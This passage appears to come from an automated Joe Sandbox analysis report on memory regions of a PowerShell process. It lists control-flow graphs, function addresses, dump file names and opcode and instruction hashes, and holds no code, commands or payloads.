                                                                                          control_flow_graph 1025 bb29f0-bb2a1e 1027 bb2af5-bb2b37 1025->1027 1028 bb2a24-bb2a3a 1025->1028 1033 bb2b3d-bb2b56 1027->1033 1034 bb2c51-bb2c61 1027->1034 1029 bb2a3f-bb2a52 1028->1029 1030 bb2a3c 1028->1030 1029->1027 1035 bb2a58-bb2a65 1029->1035 1030->1029 1036 bb2b5b-bb2b69 1033->1036 1037 bb2b58 1033->1037 1038 bb2a6a-bb2a7c 1035->1038 1039 bb2a67 1035->1039 1036->1034 1043 bb2b6f-bb2b79 1036->1043 1037->1036 1038->1027 1044 bb2a7e-bb2a88 1038->1044 1039->1038 1045 bb2b7b-bb2b7d 1043->1045 1046 bb2b87-bb2b94 1043->1046 1048 bb2a8a-bb2a8c 1044->1048 1049 bb2a96-bb2aa6 1044->1049 1045->1046 1046->1034 1047 bb2b9a-bb2baa 1046->1047 1050 bb2baf-bb2bbd 1047->1050 1051 bb2bac 1047->1051 1048->1049 1049->1027 1052 bb2aa8-bb2ab2 1049->1052 1050->1034 1057 bb2bc3-bb2bd3 1050->1057 1051->1050 1053 bb2ac0-bb2af4 1052->1053 1054 bb2ab4-bb2ab6 1052->1054 1054->1053 1058 bb2bd8-bb2be5 1057->1058 1059 bb2bd5 1057->1059 1058->1034 1062 bb2be7-bb2bf7 1058->1062 1059->1058 1063 bb2bf9 1062->1063 1064 bb2bfc-bb2c08 1062->1064 1063->1064 1064->1034 1066 bb2c0a-bb2c24 1064->1066 1067 bb2c29 1066->1067 1068 bb2c26 1066->1068 1069 bb2c2e-bb2c38 1067->1069 1068->1067 1070 bb2c3d-bb2c50 1069->1070
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 51290a5537a1ca0fefec2c265a6a5427b4906f8e920ee40972772e69eec561ef
                                                                                          • Instruction ID: 0d1bad38db41e822c900678e64fdee50138ec82dc34ddbbd87833e14f2b1e484
                                                                                          • Opcode Fuzzy Hash: 51290a5537a1ca0fefec2c265a6a5427b4906f8e920ee40972772e69eec561ef
                                                                                          • Instruction Fuzzy Hash: 39918C74A002059FCB15CF59C4949BEFBF1FF88310B2486A9D815AB3A5C775EC51CBA0
                                                                                          Function 00BBBAB8 Relevance: .2, Instructions: 158COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1206 bbbab8-bbbac0 1207 bbbaf3-bbbb58 1206->1207 1208 bbbac2-bbbaed 1206->1208 1213 bbbb5a 1207->1213 1214 bbbb5e-bbbb69 1207->1214 1208->1207 1213->1214 1215 bbbb6b 1214->1215 1216 bbbb6e-bbbbc8 call bbafa0 1214->1216 1215->1216 1223 bbbbca-bbbbcf 1216->1223 1224 bbbc19-bbbc1d 1216->1224 1223->1224 1227 bbbbd1-bbbbf4 1223->1227 1225 bbbc1f-bbbc29 1224->1225 1226 bbbc2e 1224->1226 1225->1226 1228 bbbc33-bbbc35 1226->1228 1229 bbbbfa-bbbc05 1227->1229 1230 bbbc5a 1228->1230 1231 bbbc37-bbbc58 1228->1231 1232 bbbc0e-bbbc17 1229->1232 1233 bbbc07-bbbc0d 1229->1233 1234 bbbc62-bbbc66 1230->1234 1235 bbbc5d call bba694 1230->1235 1231->1234 1232->1228 1233->1232 1237 bbbc68-bbbc91 1234->1237 1238 bbbc9f-bbbcce 1234->1238 1235->1234 1237->1238
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 34704c40bf0cbf282b67614a8dac0e38eaa7012f658268aea4743e9ee0bccf45
                                                                                          • Instruction ID: 2074d369243caea79fc493a72aec23d4c40cbcf2f2dd5e42cad3aa24296f5b32
                                                                                          • Opcode Fuzzy Hash: 34704c40bf0cbf282b67614a8dac0e38eaa7012f658268aea4743e9ee0bccf45
                                                                                          • Instruction Fuzzy Hash: 226115B1E002489FCB14DFA9D585ADDBFF1EF88310F18816AE819EB351EBB09941CB50
                                                                                          Function 00BB7728 Relevance: .2, Instructions: 156COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b1ff927bcf6953866db528d33984b4c16612af5416e4a035e1e7a6a20a661845
                                                                                          • Instruction ID: 92067c364899f282b6c810f2c132d5a968fe8bac3edc30b74b189b79401bf47c
                                                                                          • Opcode Fuzzy Hash: b1ff927bcf6953866db528d33984b4c16612af5416e4a035e1e7a6a20a661845
                                                                                          • Instruction Fuzzy Hash: 9651BD347082059FD705CB79D894ABA7BE6EFC9314B1589A9E409CB392EF71DC41CBA0
                                                                                          Function 00BBBAC8 Relevance: .2, Instructions: 155COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5fdaa65d3106ef8051cedbe8d8b4fcb57bbc447f70a4f842b97f5a305cba1532
                                                                                          • Instruction ID: 2279f920fef29e076c8871192e3242a6dae0862446afa10c42a03f7875d7dcb3
                                                                                          • Opcode Fuzzy Hash: 5fdaa65d3106ef8051cedbe8d8b4fcb57bbc447f70a4f842b97f5a305cba1532
                                                                                          • Instruction Fuzzy Hash: F861F7B1E002489FCB14DFA9D585ADDBBF1EF88310F18816AE419AB354EBB49D41CB50
                                                                                          Function 07243CCC Relevance: .1, Instructions: 124COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.2048432258.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_7240000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a95dacaf372ab9efb7f5b7184058e003d3ba53fbbcc7a83b16c7e511e56dec62
                                                                                          • Instruction ID: cea96e27138ce9b61eed49e869bd75a8ab3ecd4e2d071a5652654da5be5d67de
                                                                                          • Opcode Fuzzy Hash: a95dacaf372ab9efb7f5b7184058e003d3ba53fbbcc7a83b16c7e511e56dec62
                                                                                          • Instruction Fuzzy Hash: B34124B1B21242CBDF39CE28C5017AABBA2AF85714F1840A5D900BF257D731DC84CBA5
                                                                                          Function 00BB2B00 Relevance: .1, Instructions: 109COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2c1810e66db4a57371c42696c917391cca1b6e11d5b186a9e081a360f46d2770
                                                                                          • Instruction ID: 3a953a3871d0bb28748f08100287ec8ab74da045dba8c28056d1602d678afe67
                                                                                          • Opcode Fuzzy Hash: 2c1810e66db4a57371c42696c917391cca1b6e11d5b186a9e081a360f46d2770
                                                                                          • Instruction Fuzzy Hash: 8B4114B4A006099FCB15CF59C4989FEFBB1FF48310B2582A9D815AB364C776EC51CBA0
                                                                                          Function 00BB6FA0 Relevance: .1, Instructions: 107COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 58a61110d69e3b15302f8cb0c2ee1dfb4cbaec7d5bdf70ba6afb4596ba480af1
                                                                                          • Instruction ID: ec707a638eddabae410f051d1aac8e2c6e36d9c8c0d417716125a7c9be171849
                                                                                          • Opcode Fuzzy Hash: 58a61110d69e3b15302f8cb0c2ee1dfb4cbaec7d5bdf70ba6afb4596ba480af1
                                                                                          • Instruction Fuzzy Hash: 0C416D34A182448FCB05DB68C564AEABFF1EF8E311F1844DAD442AB3A2CB719C41CF61
                                                                                          Function 00BBC390 Relevance: .1, Instructions: 101COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b6320387e92484b3c422a03834f8ff94a6312d6e53abfe33ce58ff9ae629c3a4
                                                                                          • Instruction ID: e31821f1f5ab452cc016ed2bf18a557b05e82541e8e96fbe8fb27574ddb041de
                                                                                          • Opcode Fuzzy Hash: b6320387e92484b3c422a03834f8ff94a6312d6e53abfe33ce58ff9ae629c3a4
                                                                                          • Instruction Fuzzy Hash: 2A31A2713006019FD709EB78E894BAABBD6EFC4310F048569E519CB351EFB0AD458BA1
                                                                                          Function 00BBAE68 Relevance: .1, Instructions: 89COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a67c7c5fd782569400cfd4617eb1e9cec4bea67f4ddafc8aa77f83f6423161af
                                                                                          • Instruction ID: f8d82c1e34bba003343cd8b7bb5b7bde2c4d54621bc752c595f4a677fb353e40
                                                                                          • Opcode Fuzzy Hash: a67c7c5fd782569400cfd4617eb1e9cec4bea67f4ddafc8aa77f83f6423161af
                                                                                          • Instruction Fuzzy Hash: C13138B0E002099BCB08EFB9D4957FEBBF6EF88300F148069E501E7350EAB49C418B91
                                                                                          Function 00BBAD30 Relevance: .1, Instructions: 84COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 05f6549f928ac145600ce4c7bc5ea8529eaaa1ee12a734ad6fbdf8614748d5dc
                                                                                          • Instruction ID: 9cd3d034ed18d861b2ed2603d15e57d2d9609041994b636c8bfa806cab29df9a
                                                                                          • Opcode Fuzzy Hash: 05f6549f928ac145600ce4c7bc5ea8529eaaa1ee12a734ad6fbdf8614748d5dc
                                                                                          • Instruction Fuzzy Hash: CB3181B4E002099FDB04EF64D855AFE7BF6EF84300F1584A9E511AB3A5DA749E418FA0
                                                                                          Function 00BBAE78 Relevance: .1, Instructions: 84COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b69e99c2769cc3e3d493492ce5a0269533cfd0005fcafd05292d627d53431054
                                                                                          • Instruction ID: 61a1ff2136b9c055f93487d81cb0aa9076752552b87d7568de87649c01524ad6
                                                                                          • Opcode Fuzzy Hash: b69e99c2769cc3e3d493492ce5a0269533cfd0005fcafd05292d627d53431054
                                                                                          • Instruction Fuzzy Hash: 64311AB0E002099BDB45DFB9D4957FEBBF6EF89300F148069E405EB350EAB49C418B51
                                                                                          Function 00BB93F8 Relevance: .1, Instructions: 80COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 429b939061e9cfa7114a43593a96156019d0226ca7fbb7e479bfb6e04ecef736
                                                                                          • Instruction ID: 7692841f0b5a5cf5702e0f181cfa6eded28503ba3c38cc884dfb831b349d4ba0
                                                                                          • Opcode Fuzzy Hash: 429b939061e9cfa7114a43593a96156019d0226ca7fbb7e479bfb6e04ecef736
                                                                                          • Instruction Fuzzy Hash: 5D31BCB59017049FDB60DF6AD0897DAFBF2EF88320F28C05AD55D97304D7B468818B51
                                                                                          Function 072426FA Relevance: .1, Instructions: 77COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.2048432258.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_7240000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a7c8f8cc70a797e7ae1660bf9eb48ee19f24124df7d6a532cac055e7304819e1
                                                                                          • Instruction ID: b92130c6c277c6d0e110f5750d3d9772b796f0a58a73cc9d4e28b78ef0836410
                                                                                          • Opcode Fuzzy Hash: a7c8f8cc70a797e7ae1660bf9eb48ee19f24124df7d6a532cac055e7304819e1
                                                                                          • Instruction Fuzzy Hash: 1D218DB9A30207DFEB28CF6BC541B697BE1BB45321F04C0A6F8059B251D774D944CBA1
                                                                                          Function 00BBAD40 Relevance: .1, Instructions: 77COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 88c941829b19acaa9a1ce88d015ca08460894cd0faf5ee42abe0f0fc37c2e077
                                                                                          • Instruction ID: 50d8e6674fd24f8d651b3d18ede4410822914b779aaba81128d9be3a5526e645
                                                                                          • Opcode Fuzzy Hash: 88c941829b19acaa9a1ce88d015ca08460894cd0faf5ee42abe0f0fc37c2e077
                                                                                          • Instruction Fuzzy Hash: E03181B4E002099FDB04EFA4D855AFE7BF6EF84300F1184A9E115AB395DE749E418F90
                                                                                          Function 00B1F3D8 Relevance: .1, Instructions: 76COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1994953987.0000000000B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B1D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_b1d000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 57764560808f2d5f073ec57817e9593ef9f33c51d1ed82fa0a15ee416b34568b
                                                                                          • Instruction ID: 704727b6aa4713ab971a9eb3c97533ee374983a4c6321d299c8d827badfa4df6
                                                                                          • Opcode Fuzzy Hash: 57764560808f2d5f073ec57817e9593ef9f33c51d1ed82fa0a15ee416b34568b
                                                                                          • Instruction Fuzzy Hash: 25210272504201EFCF05CF54D9C0B27BBA5FB88314F64C5ADE9090A356C336C896CBA1
                                                                                          Function 00B1F02C Relevance: .1, Instructions: 72COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1994953987.0000000000B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B1D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_b1d000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 78d78b8cbcf497e670682178056c592b4d3260f02a304c25e1295f416304f16b
                                                                                          • Instruction ID: 3cd451085972c58fa11fb10225811b3eda86c0427e2895c8b51de41c709c6b42
                                                                                          • Opcode Fuzzy Hash: 78d78b8cbcf497e670682178056c592b4d3260f02a304c25e1295f416304f16b
                                                                                          • Instruction Fuzzy Hash: 482125B5504201DFCB14CF14C9C4B66BBA5EB88314F64C5BDD90A4B252C336D886CA61
                                                                                          Function 00BB9408 Relevance: .1, Instructions: 69COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cb182fe34ca60e8bcf09931e04dc3dbeb0162c9e71ff173f39593e14fc4b73e7
                                                                                          • Instruction ID: 174883b8854e837e4a3f2552fa28dc0d440d3987821a153cd9f56b17c005b26b
                                                                                          • Opcode Fuzzy Hash: cb182fe34ca60e8bcf09931e04dc3dbeb0162c9e71ff173f39593e14fc4b73e7
                                                                                          • Instruction Fuzzy Hash: 992157B49057488FDB60CF6AC4887DAFBF6EF98320F28C05AD95D97305D7B468818B61
                                                                                          Function 00BB7664 Relevance: .1, Instructions: 62COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1d46a37cc95e1ce6ec335b152316f5efe2ceed2a7cc404c7f3043705f446a06e
                                                                                          • Instruction ID: d6e99cfca56b0624954444f8f142052748c91f75bdbc87a4cf7113b6aa806ae8
                                                                                          • Opcode Fuzzy Hash: 1d46a37cc95e1ce6ec335b152316f5efe2ceed2a7cc404c7f3043705f446a06e
                                                                                          • Instruction Fuzzy Hash: 5A112B76B001188FCB04DBACE9409EE77F6EBC8725B0440A5E50AEB356DF34DD528BA0
                                                                                          Function 00BBC340 Relevance: .1, Instructions: 58COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: aa653f7406d8b11973f52ebb8a2e6747a525601c0135956c12778119a16597c5
                                                                                          • Instruction ID: 835efaddbd6f9f43c513d4e60005966afbb70849f8f30b2e9b9f0378caf92557
                                                                                          • Opcode Fuzzy Hash: aa653f7406d8b11973f52ebb8a2e6747a525601c0135956c12778119a16597c5
                                                                                          • Instruction Fuzzy Hash: 8F016D7260D3E25FD317963898706D67FA0CF82324F0904EBD5C5CB193D9254849C3A5
                                                                                          Function 00BBE438 Relevance: .1, Instructions: 58COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d7623b1bbb13f447f8d987a58f336921557ebe20ef2ef757969f46d61f0f41f7
                                                                                          • Instruction ID: 03f7da26ecb2cefb84909ad5e67fafa6046e4ccca33bb7933c440d6deaddb944
                                                                                          • Opcode Fuzzy Hash: d7623b1bbb13f447f8d987a58f336921557ebe20ef2ef757969f46d61f0f41f7
                                                                                          • Instruction Fuzzy Hash: C9219D718057898FDB10CF69C9047EEBFF4EF49320F28849AD458A7251D7B99944CBA1
                                                                                          Function 00B1F3D3 Relevance: .1, Instructions: 57COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1994953987.0000000000B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B1D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_b1d000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: bf7c6e54c1a5606df9920c627ceee2d02bff4a31f99f9d7d2463bdde2845d744
                                                                                          • Instruction ID: ff5e89ef2c69eaa1e414380649cd15018c64b33547a4bfb5f05ff09e2f0a81bd
                                                                                          • Opcode Fuzzy Hash: bf7c6e54c1a5606df9920c627ceee2d02bff4a31f99f9d7d2463bdde2845d744
                                                                                          • Instruction Fuzzy Hash: 1721AE76504240DFCB06CF10D5C0B26BFB2FB88314F24C5A9D9494A756C33AD89ACB91
                                                                                          Function 00B1F027 Relevance: .1, Instructions: 53COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1994953987.0000000000B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B1D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_b1d000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b4ad5f699aa1d3ceab6775d5404ed8eeb33f0730dc0ae35eb902cae87933dcc5
                                                                                          • Instruction ID: e9d537f080db4c085dc5d8d670412fe3e12c3fa5263f4418f3924545469eecfe
                                                                                          • Opcode Fuzzy Hash: b4ad5f699aa1d3ceab6775d5404ed8eeb33f0730dc0ae35eb902cae87933dcc5
                                                                                          • Instruction Fuzzy Hash: 1211DD75504280DFCB11CF14D5C4B25BFA2FB88328F28C6AAD8094B656C33AD88ACB61
                                                                                          Function 00BBE448 Relevance: .1, Instructions: 51COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8d6a064db0fc44c281d3713359bcad296b86fa2c2ba1249e8c2a15a3ee2dfe6f
                                                                                          • Instruction ID: 8d1793d762a3ae6f091fd74e958710a27c9604be6eac4700be62727f8d0dd5f9
                                                                                          • Opcode Fuzzy Hash: 8d6a064db0fc44c281d3713359bcad296b86fa2c2ba1249e8c2a15a3ee2dfe6f
                                                                                          • Instruction Fuzzy Hash: 8C1158B19003098FDB10CF9AC544BEEBBF4EF48320F2884A9D518A7350D7B9E940CBA5
                                                                                          Function 00BBBCE8 Relevance: .0, Instructions: 49COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5ff3843872ec9c7b4c3c6bea02eb6b256a2282980c6e70fc85971fc159ffe448
                                                                                          • Instruction ID: c044f0711ed609eb1fac4c7def061440205a7c7a755f52d75a12b986b09a51ca
                                                                                          • Opcode Fuzzy Hash: 5ff3843872ec9c7b4c3c6bea02eb6b256a2282980c6e70fc85971fc159ffe448
                                                                                          • Instruction Fuzzy Hash: 38019E316083449FC728DB7AD498AAA7FE5EF45310F1888EEE44AC76A2DB74AC45C700
                                                                                          Function 00BBF590 Relevance: .0, Instructions: 48COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 56c85e2f3286ea9a2189e2acb08062e659964ffc473479a87df897f562aa95f1
                                                                                          • Instruction ID: d99e215e4fe1f19f2590f2a938cd28434fdb31d3663a50fe989a39b8cb196e64
                                                                                          • Opcode Fuzzy Hash: 56c85e2f3286ea9a2189e2acb08062e659964ffc473479a87df897f562aa95f1
                                                                                          • Instruction Fuzzy Hash: 0D110535204750CFC728DF39D49086ABBF6EF8931536489ADD48A8B7A0DB36EC42CB50
                                                                                          Function 00B1D006 Relevance: .0, Instructions: 47COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1994953987.0000000000B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B1D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_b1d000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: adb48f82282d3854ed04453c254edd2c1ec5795aafc448b3e0e35c37eee319b6
                                                                                          • Instruction ID: 23b2622ecf6094885e2f0700bfc2ec837e9fba4156bbd80750ac9336fb0ba757
                                                                                          • Opcode Fuzzy Hash: adb48f82282d3854ed04453c254edd2c1ec5795aafc448b3e0e35c37eee319b6
                                                                                          • Instruction Fuzzy Hash: 10016D6240D3805FD7124A258898692BFA8DB57224F1980CBE9848F1A3C2685C85C771
                                                                                          Function 00B1D01D Relevance: .0, Instructions: 45COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1994953987.0000000000B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B1D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_b1d000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fbe3090be031b48c991131f15f7b9a15df72bbb6364b19bae41ba0c376a5f353
                                                                                          • Instruction ID: fc4a0883d91dc54ea9c753b1dfa0a23e48cab594bf6aca714d04536105753791
                                                                                          • Opcode Fuzzy Hash: fbe3090be031b48c991131f15f7b9a15df72bbb6364b19bae41ba0c376a5f353
                                                                                          • Instruction Fuzzy Hash: 6D012B715053049AE7108E29CCC8BA7BFD8DF45364F58C49AED484B142C7789881D6B1
                                                                                          Function 00BB7940 Relevance: .0, Instructions: 43COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
